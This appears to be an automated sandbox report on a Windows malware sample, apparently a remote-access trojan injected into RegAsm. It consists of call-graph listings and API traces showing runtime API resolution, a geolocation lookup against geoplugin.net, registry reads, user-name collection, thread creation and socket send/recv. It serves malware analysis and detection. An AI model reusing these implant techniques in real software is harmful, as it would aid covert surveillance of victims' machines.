___std_exception_copy 20 API calls 48652->48654 48663 414e93 48652->48663 48653->48652 48655 414e5e 48654->48655 48657 441a98 20 API calls 48655->48657 48656 414e99 GetProcAddress 48658 414eb4 FreeLibrary 48656->48658 48656->48663 48659 414e6e LoadLibraryA 48657->48659 48660 414eb2 48658->48660 48661 414e82 GetProcAddress 48659->48661 48659->48662 48660->48662 48661->48663 48664 414e8e FreeLibrary 48661->48664 48662->48496 48663->48656 48663->48660 48663->48662 48664->48663 48666 441a59 48665->48666 48667 441a4b 48665->48667 48679 4405dd 20 API calls __dosmaperr 48666->48679 48667->48666 48670 441a70 48667->48670 48669 441a61 __wsopen_s 48669->48648 48670->48669 48680 4405dd 20 API calls __dosmaperr 48670->48680 48673 441ab4 48672->48673 48675 441aa6 48672->48675 48681 4405dd 20 API calls __dosmaperr 48673->48681 48675->48673 48676 441add 48675->48676 48678 441abc __wsopen_s 48676->48678 48682 4405dd 20 API calls __dosmaperr 48676->48682 48678->48650 48679->48669 48680->48669 48681->48678 48682->48678 48683->48506 48688 40515c 102 API calls 48685->48688 48687 405159 48688->48687 48689->48534 48690->48525 48691->48555 48692->48568 48693->48565 48694->48536 48696->48584 48700 414553 48697->48700 48701 414568 ___scrt_initialize_default_local_stdio_options 48700->48701 48704 43f79d 48701->48704 48707 43c4f0 48704->48707 48708 43c530 48707->48708 48709 43c518 48707->48709 48708->48709 48711 43c538 48708->48711 48722 4405dd 20 API calls __dosmaperr 48709->48722 48712 43a7b7 __cftof 36 API calls 48711->48712 48713 43c548 48712->48713 48723 43cc76 20 API calls 2 library calls 48713->48723 48714 43c51d __wsopen_s 48716 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 48714->48716 48718 414576 48716->48718 48717 43c5c0 48724 43d2e4 51 API calls 3 library calls 48717->48724 48718->47949 48721 43c5cb 48725 43cce0 20 API calls _free 48721->48725 48722->48714 48723->48717 48724->48721 48725->48714 48727 441c94 48726->48727 48729 441ccb __wsopen_s 48727->48729 48730 4405dd 20 API calls __dosmaperr 48727->48730 48729->48591 48730->48729 48732 4020df 11 API calls 48731->48732 48739 404cde 48732->48739 48733 404e13 48734 401fd8 11 API calls 48733->48734 48735 404e1c 48734->48735 48735->48625 48736 4041a2 28 API calls 48736->48739 48737 4020f6 28 API calls 48737->48739 48738 401fc0 28 API calls 48740 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 48738->48740 48739->48733 48739->48736 48739->48737 48739->48738 48741 401fe2 28 API calls 48739->48741 48742 401fd8 11 API calls 48739->48742 48740->48739 48745 415aea 48740->48745 48741->48739 48742->48739 48743->48635 48744->48630 48746 4020f6 28 API calls 48745->48746 48747 415b0c SetEvent 48746->48747 48748 415b21 48747->48748 48749 4041a2 28 API calls 48748->48749 48750 415b3b 48749->48750 48751 4020f6 28 API calls 48750->48751 48752 415b4b 48751->48752 48753 4020f6 28 API calls 48752->48753 48754 415b5d 48753->48754 48755 41be1b 28 API calls 48754->48755 48756 415b66 48755->48756 48757 417089 48756->48757 48758 415b86 GetTickCount 48756->48758 48759 415d2f 48756->48759 48760 401e8d 11 API calls 48757->48760 48761 41bb8e 28 API calls 48758->48761 48759->48757 48819 415ce5 48759->48819 48762 417092 48760->48762 48763 415b97 48761->48763 48764 401fd8 11 API calls 48762->48764 48766 41bae6 GetTickCount 48763->48766 48767 41709e 48764->48767 48769 415ba3 48766->48769 48770 401fd8 11 API calls 48767->48770 48768 415cc9 48768->48757 48771 41bb8e 28 API calls 48769->48771 48772 4170aa 48770->48772 48773 415bae 48771->48773 48774 41ba96 30 API calls 48773->48774 48775 415bbc 48774->48775 48776 41bd1e 28 API calls 48775->48776 48777 415bca 48776->48777 48778 401e65 22 API calls 48777->48778 48779 415bd8 48778->48779 48824 402f31 28 API calls 48779->48824 48781 415be6 48825 402ea1 28 API calls 48781->48825 48783 415bf5 48784 402f10 28 API calls 48783->48784 48785 415c04 48784->48785 48826 402ea1 28 API calls 48785->48826 48787 415c13 48788 402f10 28 API calls 48787->48788 48789 415c1f 48788->48789 48827 402ea1 28 API calls 48789->48827 48791 415c29 48828 404aa1 61 API calls ctype 48791->48828 48793 415c38 48794 401fd8 11 API calls 48793->48794 48795 415c41 48794->48795 48796 401fd8 11 API calls 48795->48796 48797 415c4d 48796->48797 48798 401fd8 11 API calls 48797->48798 48799 415c59 48798->48799 48800 401fd8 11 API calls 48799->48800 48801 415c65 48800->48801 48802 401fd8 11 API calls 48801->48802 48803 415c71 48802->48803 48804 401fd8 11 API calls 48803->48804 48805 415c7d 48804->48805 48806 401f09 11 API calls 48805->48806 48807 415c86 48806->48807 48808 401fd8 11 API calls 48807->48808 48809 415c8f 48808->48809 48810 401fd8 11 API calls 48809->48810 48811 415c98 48810->48811 48812 401e65 22 API calls 48811->48812 48813 415ca3 48812->48813 48814 43baac _strftime 40 API calls 48813->48814 48815 415cb0 48814->48815 48816 415cb5 48815->48816 48817 415cdb 48815->48817 48820 415cc3 48816->48820 48821 415cce 48816->48821 48818 401e65 22 API calls 48817->48818 48818->48819 48819->48757 48830 4050e4 84 API calls 48819->48830 48829 404ff4 82 API calls 48820->48829 48822 404f51 105 API calls 48821->48822 48822->48768 48824->48781 48825->48783 48826->48787 48827->48791 48828->48793 48829->48768 48830->48768 48833 401f8e 48832->48833 48834 402252 11 API calls 48833->48834 48835 401f99 48834->48835 48835->47993 48835->47994 48835->47996 48836->47999 48837->48026 48838->48025 48839->48014 48840->48020 48841->48024 48842->48056 48847 40f7c2 48845->48847 48846 413549 3 API calls 48846->48847 48847->48846 48849 40f866 48847->48849 48851 40f856 Sleep 48847->48851 48867 40f7f4 48847->48867 48848 40905c 28 API calls 48848->48867 48850 40905c 28 API calls 48849->48850 48854 40f871 48850->48854 48851->48847 48853 41bc5e 28 API calls 48853->48867 48855 41bc5e 28 API calls 48854->48855 48856 40f87d 48855->48856 48880 413814 14 API calls 48856->48880 48859 401f09 11 API calls 48859->48867 48860 40f890 48861 401f09 11 API calls 48860->48861 48863 40f89c 48861->48863 48862 402093 28 API calls 48862->48867 48864 402093 28 API calls 48863->48864 48865 40f8ad 48864->48865 48868 41376f 14 API calls 48865->48868 48866 41376f 14 API calls 48866->48867 48867->48848 48867->48851 48867->48853 48867->48859 48867->48862 48867->48866 48878 40d096 112 API calls ___scrt_get_show_window_mode 48867->48878 48879 413814 14 API calls 48867->48879 48869 40f8c0 48868->48869 48881 412850 TerminateProcess WaitForSingleObject 48869->48881 48871 40f8c8 ExitProcess 48882 4127ee 62 API calls 48877->48882 48879->48867 48880->48860 48881->48871 48883 4269e6 48884 4269fb 48883->48884 48889 426a8d 48883->48889 48885 426a48 48884->48885 48886 426b44 48884->48886 48887 426abd 48884->48887 48888 426b1d 48884->48888 48884->48889 48892 426af2 48884->48892 48896 426a7d 48884->48896 48911 424edd 49 API calls ctype 48884->48911 48885->48889 48885->48896 48912 41fb6c 52 API calls 48885->48912 48886->48889 48916 426155 28 API calls 48886->48916 48887->48889 48887->48892 48914 41fb6c 52 API calls 48887->48914 48888->48886 48888->48889 48899 425ae1 48888->48899 48892->48888 48915 4256f0 21 API calls 48892->48915 48896->48887 48896->48889 48913 424edd 49 API calls ctype 48896->48913 48900 425b00 ___scrt_get_show_window_mode 48899->48900 48903 425b0f 48900->48903 48908 425b34 48900->48908 48917 41ebbb 21 API calls 48900->48917 48901 425b14 48906 425b1d 48901->48906 48901->48908 48920 41da5f 49 API calls 48901->48920 48903->48901 48903->48908 48918 4205d8 46 API calls 48903->48918 48906->48908 48921 424d05 21 API calls 2 library calls 48906->48921 48908->48886 48909 425bb7 48909->48908 48919 432ec4 21 API calls new 48909->48919 48911->48885 48912->48885 48913->48887 48914->48887 48915->48888 48916->48889 48917->48903 48918->48909 48919->48901 48920->48906 48921->48908 48922 434875 48927 434b47 SetUnhandledExceptionFilter 48922->48927 48924 43487a pre_c_initialization 48928 44554b 20 API calls 2 library calls 48924->48928 48926 434885 48927->48924 48928->48926 48929 415d06 48944 41b380 48929->48944 48931 415d0f 48932 4020f6 28 API calls 48931->48932 48933 415d1e 48932->48933 48955 404aa1 61 API calls ctype 48933->48955 48935 415d2a 48936 417089 48935->48936 48937 401fd8 11 API calls 48935->48937 48938 401e8d 11 API calls 48936->48938 48937->48936 48939 417092 48938->48939 48940 401fd8 11 API calls 48939->48940 48941 41709e 48940->48941 48942 401fd8 11 API calls 48941->48942 48943 4170aa 48942->48943 48945 4020df 11 API calls 48944->48945 48946 41b38e 48945->48946 48947 43bd51 new 21 API calls 48946->48947 48948 41b39e InternetOpenW InternetOpenUrlW 48947->48948 48949 41b3c5 InternetReadFile 48948->48949 48952 41b3e8 48949->48952 48950 4020b7 28 API calls 48950->48952 48951 41b415 InternetCloseHandle InternetCloseHandle 48953 41b427 48951->48953 48952->48949 48952->48950 48952->48951 48954 401fd8 11 API calls 48952->48954 48953->48931 48954->48952 48955->48935 48956 426c4b 48961 426cc8 send 48956->48961 48962 44831e 48970 448710 48962->48970 48965 448332 48967 44833a 48968 448347 48967->48968 48978 44834a 11 API calls 48967->48978 48971 4484ca __Toupper 5 API calls 48970->48971 48972 448737 48971->48972 48973 44874f TlsAlloc 48972->48973 48976 448740 48972->48976 48973->48976 48974 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 48975 448328 48974->48975 48975->48965 48977 448299 20 API calls 3 library calls 48975->48977 48976->48974 48977->48967 48978->48965 48979 43be58 48981 43be64 _swprintf ___FrameUnwindToState 48979->48981 48980 43be72 48995 4405dd 20 API calls __dosmaperr 48980->48995 48981->48980 48983 43be9c 48981->48983 48990 445888 EnterCriticalSection 48983->48990 48985 43be77 ___FrameUnwindToState __wsopen_s 48986 43bea7 48991 43bf48 48986->48991 48990->48986 48993 43bf56 48991->48993 48992 43beb2 48996 43becf LeaveCriticalSection std::_Lockit::~_Lockit 48992->48996 48993->48992 48997 44976c 37 API calls 2 library calls 48993->48997 48995->48985 48996->48985 48997->48993 48998 41dfbd 48999 41dfd2 ctype ___scrt_get_show_window_mode 48998->48999 49011 41e1d5 48999->49011 49017 432ec4 21 API calls new 48999->49017 49002 41e1e6 49009 41e189 49002->49009 49013 432ec4 21 API calls new 49002->49013 49004 41e182 ___scrt_get_show_window_mode 49004->49009 49018 432ec4 21 API calls new 49004->49018 49006 41e21f ___scrt_get_show_window_mode 49006->49009 49014 43354a 49006->49014 49007 41e1af ___scrt_get_show_window_mode 49007->49009 49019 432ec4 21 API calls new 49007->49019 49011->49009 49012 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49011->49012 49012->49002 49013->49006 49020 433469 49014->49020 49016 433552 49016->49009 49017->49004 49018->49007 49019->49011 49021 433482 49020->49021 49025 433478 49020->49025 49021->49025 49026 432ec4 21 API calls new 49021->49026 49023 4334a3 49023->49025 49027 433837 CryptAcquireContextA 49023->49027 49025->49016 49026->49023 49028 433853 49027->49028 49029 433858 CryptGenRandom 49027->49029 49028->49025 49029->49028 49030 43386d CryptReleaseContext 49029->49030 49030->49028 49031 40165e 49032 401666 49031->49032 49033 401669 49031->49033 49034 4016a8 49033->49034 49037 401696 49033->49037 49035 4344ea new 22 API calls 49034->49035 49036 40169c 49035->49036 49038 4344ea new 22 API calls 49037->49038 49038->49036 49039 426bdc 49045 426cb1 recv 49039->49045

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                                  • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                                  • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                                  • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                                  • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                                  • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                  • API String ID: 4236061018-3687161714
                                                                  • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                  • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                  • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                  • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1175 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1180 41b3c5-41b3e6 InternetReadFile 1175->1180 1181 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1180->1181 1182 41b40c-41b40f 1180->1182 1181->1182 1184 41b411-41b413 1182->1184 1185 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1182->1185 1184->1180 1184->1185 1189 41b427-41b431 1185->1189
                                                                  APIs
                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                  Strings
                                                                  • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                  • String ID: http://geoplugin.net/json.gp
                                                                  • API String ID: 3121278467-91888290
                                                                  • Opcode ID: ed6e4750be8d51d583a68a6d75bf3866e9d73d32e6528751d06602238a365c91
                                                                  • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                  • Opcode Fuzzy Hash: ed6e4750be8d51d583a68a6d75bf3866e9d73d32e6528751d06602238a365c91
                                                                  • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                    • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                                                    • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                  • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                  • String ID: 5.0.0 Pro$override$pth_unenc
                                                                  • API String ID: 2281282204-3992771774
                                                                  • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                                                  • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                  • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                                                  • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                  APIs
                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00559610), ref: 00433849
                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                  • String ID:
                                                                  • API String ID: 1815803762-0
                                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                  • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                  • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                                  Strings
                                                                  • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Time$FileSystem
                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                  • API String ID: 2086374402-595813830
                                                                  • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                                  • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                                  • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                                  • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                                  APIs
                                                                  • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                  • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                  • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                  • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                  • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                  • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                  • Instruction Fuzzy Hash:

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 89 40ec13-40ec1a 79->89 90 40ec0c-40ec0e 79->90 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 94 40ec1c 89->94 95 40ec1e-40ec2a call 41b2c3 89->95 93 40eef1 90->93 93->49 94->95 105 40ec33-40ec37 95->105 106 40ec2c-40ec2e 95->106 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 105->108 109 40ec39 call 407716 105->109 106->105 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 148 40ec71 call 407260 144->148 148->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 204 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->204 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 190 40ee1e-40ee42 call 40247c call 434798 183->190 184->190 212 40ee51 190->212 213 40ee44-40ee4f call 436e90 190->213 204->177 218 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 212->218 213->218 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 218->272 287 40efc1 234->287 288 40efdc-40efde 234->288 272->234 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->286 286->234 306 40eeef 286->306 290 40efc3-40efda call 41cd9b CreateThread 287->290 291 40efe0-40efe2 288->291 292 40efe4 288->292 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 291->290 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 